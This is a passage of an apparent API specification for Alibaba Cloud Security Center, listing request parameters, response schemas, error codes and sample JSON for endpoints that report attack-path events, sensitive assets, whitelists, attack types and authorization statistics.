\\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"AttackPathEvent\\": {\\n \\"DstAsset\\": {\\n \\"AssetSubType\\": 2,\\n \\"AssetType\\": 3,\\n \\"InstanceId\\": \\"i-bp18ifsr1tu1dx39****\\\\n\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"Vendor\\": 0,\\n \\"SensitiveAssetFlag\\": 0\\n },\\n \\"FirstTime\\": 1735956726000,\\n \\"LastTime\\": 1741832168000,\\n \\"PathEventEdgeList\\": [\\n {\\n \\"EdgeId\\": 123,\\n \\"EdgeType\\": \\"role_trust_user\\",\\n \\"ElementType\\": \\"branch\\",\\n \\"EndNodeUuid\\": \\"52d59cca9d1768bab5fe081317637990\\",\\n \\"RepairSuggestionDisplay\\": \\"The RAM role is granted the administrator permissions and trusts the user of another Alibaba Cloud account. In this case, the current Alibaba Cloud account may be fully controlled by the trusted Alibaba Cloud account. We recommend that you delete the trust relationship. If you need to trust another Alibaba Cloud account, we recommend that you split your business requirements and follow the principle of least privilege to grant permissions across accounts in a fine-grained manner. You can also use RAM.\\\\\\\\n\\\\\\\\nIf you confirm that the role does not need to trust an Alibaba Cloud account, perform the following operations: In the RAM console, click the required RAM role. On the page that appears, view the trust policy of the role. Then, edit the Service field to delete the trust relationship. If you confirm that permissions can be reduced, perform the following operations: In the RAM console, click the required RAM role. On the page that appears, view the permissions of the role. Then, find the policy that defines the administrator permissions and revoke the policy. Attach another policy to the role based on your business requirements.\\",\\n \\"StartNodeUuid\\": \\"b7e1bd42c4ca47f69020f4a27b47d2b4\\"\\n }\\n ],\\n \\"PathEventNodeList\\": [\\n {\\n \\"ElementType\\": \\"branch\\",\\n \\"NodeDetail\\": \\"{\\\\\\"assetId\\\\\\":0}\\",\\n \\"NodeName\\": \\"hypermatch_uploader\\",\\n \\"NodeType\\": \\"user\\",\\n \\"NodeUuid\\": \\"52d59cca9d1768bab5fe081317637990\\",\\n \\"SensitiveAssetFlag\\": 0,\\n \\"AiAssetFlag\\": 1\\n }\\n ],\\n \\"PathName\\": \\"ecs_get_credential_by_create_login_profile\\",\\n \\"PathNameDesc\\": \\"ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User\\",\\n \\"PathType\\": \\"role_escalation\\",\\n \\"RiskLevel\\": \\"suspicious\\",\\n \\"SrcAsset\\": {\\n \\"AssetSubType\\": 4,\\n \\"AssetType\\": 14,\\n \\"InstanceId\\": \\"i-25b24****\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Vendor\\": 0,\\n \\"SensitiveAssetFlag\\": 0\\n },\\n \\"PathTypeDesc\\": \\"Privilege Escalation by Role\\",\\n \\"PathDetailDesc\\": \\"The system detects that the role that trusts another Alibaba Cloud account has administrator permissions. This can cause the system to be fully controlled. We recommend that you delete the trust relationship and review the permissions of the role.\\\\n\\"\\n }\\n}","type":"json"}]', ], 'GetAttackPathEventStatistics' => [ 'summary' => 'Queries attack path event statistics.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226465', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '89AD16CC-97EE-50F3-9B12-9E28E5C8****', 'title' => ''], 'TotalPathRiskNum' => ['description' => 'The number of risky paths.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'SeriousPathRiskNum' => ['description' => 'The number of attack paths that require immediate handling.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'TotalAssetRiskNum' => ['description' => 'The number of risky assets.', 'type' => 'integer', 'format' => 'int64', 'example' => '5', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query attack path event statistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackPathEventStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"89AD16CC-97EE-50F3-9B12-9E28E5C8****\\",\\n \\"TotalPathRiskNum\\": 10,\\n \\"SeriousPathRiskNum\\": 1,\\n \\"TotalAssetRiskNum\\": 5\\n}","type":"json"}]', ], 'GetAttackPathSensitiveAssetConfig' => [ 'summary' => 'Queries the sensitive assets in an attack path.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226506', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ConfigType', 'in' => 'query', 'schema' => ['description' => 'The configuration type. Valid values:'."\n" .'- asset_instance: asset.', 'type' => 'string', 'required' => true, 'example' => 'asset_instance', 'title' => ''], ], [ 'name' => 'AttackPathSensitiveAssetConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the attack path sensitive asset configuration.', 'type' => 'string', 'required' => false, 'example' => 'apsac-123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], 'AttackPathSensitiveAssetConfig' => [ 'description' => 'The attack path sensitive asset configuration data.', 'type' => 'object', 'properties' => [ 'AttackPathAssetList' => [ 'description' => 'The list of cloud service assets in the attack path.', 'type' => 'array', 'items' => [ 'description' => 'The cloud service asset in the attack path.', 'type' => 'object', 'properties' => [ 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '17', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the cloud service asset.', 'type' => 'string', 'example' => 'i-bp174zui735kvf3v****', 'title' => ''], 'InstanceName' => ['description' => 'The name of the cloud service asset instance.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AttackPathSensitiveAssetConfigId' => ['description' => 'The ID of the attack path sensitive asset settings.', 'type' => 'string', 'example' => 'apsac-123'."\n", 'title' => ''], 'ConfigType' => ['description' => 'The configuration type. Valid values:'."\n" .'- asset_instance: asset.', 'type' => 'string', 'example' => 'asset_instance', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query attack path sensitive asset settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackPathSensitiveAssetConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathSensitiveAssetConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathsensitiveassetconfig/{#AttackPathSensitiveAssetConfigId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"AttackPathSensitiveAssetConfig\\": {\\n \\"AttackPathAssetList\\": [\\n {\\n \\"AssetSubType\\": 0,\\n \\"AssetType\\": 17,\\n \\"InstanceId\\": \\"i-bp174zui735kvf3v****\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Vendor\\": 4\\n }\\n ],\\n \\"AttackPathSensitiveAssetConfigId\\": \\"apsac-123\\\\n\\",\\n \\"ConfigType\\": \\"asset_instance\\"\\n }\\n}","type":"json"}]', ], 'GetAttackPathWhitelist' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226516', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], ], 'parameters' => [ [ 'name' => 'AttackPathWhitelistId', 'in' => 'query', 'schema' => ['description' => 'The attack path whitelist ID.'."\n" .'> You can call [ListAttackPathWhitelist](~~ListAttackPathWhitelist~~) to query attack path whitelist IDs.', 'type' => 'string', 'required' => true, 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D03DD0FD-6041-5107-AC00-383E28F1****', 'title' => ''], 'AttackPathWhitelist' => [ 'description' => 'The attack path whitelist.', 'type' => 'object', 'properties' => [ 'AttackPathAssetList' => [ 'description' => 'The list of cloud service assets in the attack path.', 'type' => 'array', 'items' => [ 'description' => 'The list of cloud service assets in the attack path.', 'type' => 'object', 'properties' => [ 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the cloud service asset.', 'type' => 'string', 'example' => 'i-8vb0e8qdaj0yyxjo****'."\n", 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'xwl', 'title' => ''], 'NodeType' => ['description' => 'The node type. Valid values:'."\n" .'- **start**: start node.'."\n" .'- **end**: end node.', 'type' => 'string', 'example' => 'start', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AttackPathWhitelistId' => ['description' => 'The attack path whitelist ID.', 'type' => 'string', 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****'."\n", 'title' => ''], 'LastModifiedTimestamp' => ['description' => 'The timestamp of the last modification, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1743004587000', 'title' => ''], 'PathName' => ['description' => 'The path name.', 'type' => 'string', 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], 'PathType' => ['description' => 'The path type.', 'type' => 'string', 'example' => 'role_escalation', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'WhitelistType' => ['description' => 'The whitelist type. Valid values:'."\n" ."\n" .'- **ALL_ASSET**: all assets.'."\n" .'- **PART_ASSET**: partial assets.', 'type' => 'string', 'example' => 'ALL_ASSET', 'title' => ''], 'WhitelistName' => ['description' => 'The whitelist name.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query attack path whitelist details', 'summary' => 'Queries the details of an attack path whitelist.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackPathWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathwhitelist/{#AttackPathWhitelist}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D03DD0FD-6041-5107-AC00-383E28F1****\\",\\n \\"AttackPathWhitelist\\": {\\n \\"AttackPathAssetList\\": [\\n {\\n \\"AssetSubType\\": 0,\\n \\"AssetType\\": 1,\\n \\"InstanceId\\": \\"i-8vb0e8qdaj0yyxjo****\\\\n\\",\\n \\"RegionId\\": \\"cn-shanghai\\",\\n \\"Vendor\\": 0,\\n \\"InstanceName\\": \\"xwl\\",\\n \\"NodeType\\": \\"start\\"\\n }\\n ],\\n \\"AttackPathWhitelistId\\": \\"apwl-b33dec0acf9b42aabde032d656c0****\\\\n\\",\\n \\"LastModifiedTimestamp\\": 1743004587000,\\n \\"PathName\\": \\"ecs_get_credential_by_create_login_profile\\",\\n \\"PathType\\": \\"role_escalation\\",\\n \\"Remark\\": \\"test\\",\\n \\"WhitelistType\\": \\"ALL_ASSET\\",\\n \\"WhitelistName\\": \\"test\\"\\n }\\n}","type":"json"}]', ], 'GetAttackTypeList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92288', 'abilityTreeNodes' => ['FEATUREsasU5OJQA'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is generated by Alibaba Cloud and is a unique identifier used for troubleshooting and locating issues.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****', 'title' => ''], 'AttackTypeList' => [ 'description' => 'The list of attack types.', 'type' => 'array', 'items' => [ 'description' => 'The list of attack types.', 'type' => 'object', 'properties' => [ 'Value' => ['description' => 'The type value.', 'type' => 'string', 'example' => 'upload', 'title' => ''], 'Label' => ['description' => 'The attack type description.', 'type' => 'string', 'example' => 'sas.attack.type.type12', 'title' => ''], 'Status_Type' => ['description' => 'The attack source. Valid values:'."\n" ."\n" .'- **cfw**: Cloud Firewall.'."\n" .'- **alinet**: Network defense plugin.'."\n" .'- **waf**: Web Application Firewall.', 'type' => 'string', 'example' => 'alinet', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve attack type list', 'summary' => 'Retrieves the list of attack types for the attack analysis event display.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAttackTypeList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"AttackTypeList\\": [\\n {\\n \\"Value\\": \\"upload\\",\\n \\"Label\\": \\"sas.attack.type.type12\\",\\n \\"Status_Type\\": \\"alinet\\"\\n }\\n ]\\n}","type":"json"}]', ], 'GetAuthSummary' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92289', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for this request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => '0B48AB3C-***-B9270EF46038', 'title' => ''], 'DefaultAuthToAll' => ['description' => 'Indicates whether all assets are authorized by default. Valid values:'."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AllowPartialBuy' => ['description' => 'Indicates whether on-demand authorization purchase is allowed during a new purchase. Valid values:'."\n" .'- **0**: Not allowed.'."\n" .'- **1**: Allowed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AllowUpgradePartialBuy' => ['description' => 'Indicates whether upgrading to on-demand authorization purchase is allowed during an upgrade. Valid values:'."\n" .'- **0**: Not allowed.'."\n" .'- **1**: Allowed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'HasPreBindSetting' => ['description' => 'Indicates whether a pre-bindingasset configuration exists. Pre-binding refers to the asset binding configuration selected in advance during purchase. Valid values:'."\n" .'- **0**: Does not exist.'."\n" .'- **1**: Exists.', 'type' => 'boolean', 'example' => '1', 'title' => ''], 'IsMultiVersion' => ['description' => 'Indicates whether multiple versions exist. Valid values:'."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AutoBind' => ['description' => 'Indicates whether new subscription assets are automatically bound when the host and container security subscription service is activated. Valid values:'."\n" ."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'HighestVersion' => ['description' => 'The highest purchased edition of Security Center. Valid values:'."\n" .'- **1**: Free Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **7**: Ultimate Edition.'."\n" .'- **10**: Value-added services only.'."\n" .'> If a single edition is purchased, this value indicates the corresponding edition. If multiple editions are purchased, this value indicates the highest edition among the sub-editions.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Machine' => [ 'description' => 'The asset authorization statistics information.', 'type' => 'object', 'properties' => [ 'RiskCoreCount' => ['description' => 'The number of cores of assets that have security risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'BindCoreCount' => ['description' => 'The number of cores of assets that are bound with authorization.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalEcsCount' => ['description' => 'The total number of assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'BindEcsCount' => ['description' => 'The number of bound assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCoreCount' => ['description' => 'The total number of asset cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RiskEcsCount' => ['description' => 'The number of assets that have security risks.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnBindEcsCount' => ['description' => 'The number of unbound assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnBindCoreCount' => ['description' => 'The number of cores of unbound assets.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'PostPaidBindCoreCount' => ['description' => 'The number of cores of assets bound with pay-as-you-go authorization.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'PostPaidBindEcsCount' => ['description' => 'The number of assets bound with pay-as-you-go authorization.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'VersionSummary' => [ 'description' => 'The authorization usage statistics information.', 'type' => 'array', 'items' => [ 'description' => 'The authorization usage statistics information.', 'type' => 'object', 'properties' => [ 'Index' => ['description' => 'The index of the current edition. A larger value indicates a higher edition. This parameter is used for sorting. Valid values:'."\n" .'- **1**: Free Edition. '."\n" .'- **2**: Anti-virus Edition. '."\n" .'- **3**: Premium Edition.'."\n" .'- **4**: Enterprise Edition.'."\n" .'- **5**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Version' => ['description' => 'The purchased edition of Security Center. Valid values: '."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition. '."\n" .'- **8**: Multi-version. '."\n" .'- **10**: Value-added services only.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'UsedCoreCount' => ['description' => 'The number of authorized cores that have been used.'."\n" .'> This parameter is valid only when AuthBindType is set to CORE or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnUsedCount' => ['description' => 'The number of unused authorized assets.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UsedEcsCount' => ['description' => 'The number of authorized assets that have been used.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of authorized assets for the current edition.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalEcsAuthCount' => ['description' => 'The total number of authorized assets.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCoreAuthCount' => ['description' => 'The total number of authorized cores.'."\n" .'> This parameter is valid only when AuthBindType is set to CORE or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnusedEcsAuthCount' => ['description' => 'The number of unused authorized assets.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'UnusedCoreAuthCount' => ['description' => 'The number of unused authorized cores.'."\n" .'> This parameter is valid only when AuthBindType is set to CORE or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'AuthBindType' => ['description' => 'The type of authorization consumed during binding. Valid values:'."\n" .'- ASSET: consumes authorized asset count.'."\n" .'- CORE: consumes authorized core count.'."\n" .'- ASSET_AND_CORE: consumes both authorized asset count and authorized core count.', 'type' => 'string', 'example' => 'ASSET', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'AllowUserUnbind' => ['description' => 'Indicates whether immediately unbinding all bound assets is allowed. Valid values:'."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PostPaidVersionSummary' => [ 'description' => 'The service authorization statistics for the host and container security pay-as-you-go service.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'AuthBindType' => ['description' => 'The type of authorization consumed during binding. Valid values:'."\n" .'- **ASSET**: consumes authorized asset count.'."\n" .'- **CORE**: consumes authorized core count.'."\n" .'- **ASSET_AND_CORE**: consumes both authorized asset count and authorized core count.', 'type' => 'string', 'example' => 'ASSET', 'title' => ''], 'Version' => ['description' => 'The pay-as-you-go edition bound to the host assets. Valid values: '."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Index' => ['description' => 'The index of the current edition. A larger value indicates a higher edition. This parameter is used for sorting. Valid values:'."\n" .'- **1**: Free Edition. '."\n" .'- **2**: Anti-virus Edition. '."\n" .'- **3**: Premium Edition.'."\n" .'- **4**: Enterprise Edition.'."\n" .'- **5**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'UsedCoreCount' => ['description' => 'The number of authorized cores that have been used.'."\n" .'> This parameter is valid only when AuthBindType is set to CORE or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'UsedEcsCount' => ['description' => 'The number of authorized assets that have been used.'."\n" .'> This parameter is valid only when AuthBindType is set to ASSET or ASSET_AND_CORE.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PostPaidHostAutoBind' => ['description' => 'Indicates whether new hosts are automatically bound for the host and container security pay-as-you-go service. Valid values:'."\n" .'- **0**: Disabled.'."\n" .'- **1**: Enabled.', 'type' => 'string', 'example' => '1', 'title' => ''], 'PostPaidHostAutoBindVersion' => ['description' => 'The edition to which new assets are automatically bound for the host and container security pay-as-you-go service. Valid values:'."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition.', 'type' => 'string', 'example' => '7', 'title' => ''], 'PostPaidHighestVersion' => ['description' => 'The protection edition of the host and container security pay-as-you-go service. This value represents the highest protection edition among all bound hosts. Valid values: '."\n" .'- **1**: Free Edition. '."\n" .'- **3**: Enterprise Edition.'."\n" .'- **5**: Premium Edition.'."\n" .'- **6**: Anti-virus Edition. '."\n" .'- **7**: Ultimate Edition.', 'type' => 'string', 'example' => '7', 'title' => ''], 'InvalidBindStatus' => ['description' => 'The binding validity status. Valid values:'."\n" .'- **NORMAL**: Valid.'."\n" .'- **INVALID_NODE_VERSION**: Invalid.', 'type' => 'string', 'example' => 'INVALID_NODE_VERSION', 'title' => ''], 'ClusterNodeCheck' => ['description' => 'Indicates whether the cluster node requires machine version verification. Valid values:'."\n" .'- **0**: Not required.'."\n" .'- **1**: Required.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'EdrSummary' => [ 'type' => 'object', 'properties' => [ 'BoundCount' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'PostPaidAutoBind' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], 'HybridPaidAutoBind' => ['type' => 'string', 'description' => '', 'title' => '', 'example' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve authorization statistics', 'summary' => 'Retrieves authorization statistics.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAuthSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0B48AB3C-***-B9270EF46038\\",\\n \\"DefaultAuthToAll\\": 1,\\n \\"AllowPartialBuy\\": 1,\\n \\"AllowUpgradePartialBuy\\": 1,\\n \\"HasPreBindSetting\\": true,\\n \\"IsMultiVersion\\": 1,\\n \\"AutoBind\\": 1,\\n \\"HighestVersion\\": 1,\\n \\"Machine\\": {\\n \\"RiskCoreCount\\": 10,\\n \\"BindCoreCount\\": 10,\\n \\"TotalEcsCount\\": 10,\\n \\"BindEcsCount\\": 10,\\n \\"TotalCoreCount\\": 10,\\n \\"RiskEcsCount\\": 10,\\n \\"UnBindEcsCount\\": 10,\\n \\"UnBindCoreCount\\": 10,\\n \\"PostPaidBindCoreCount\\": 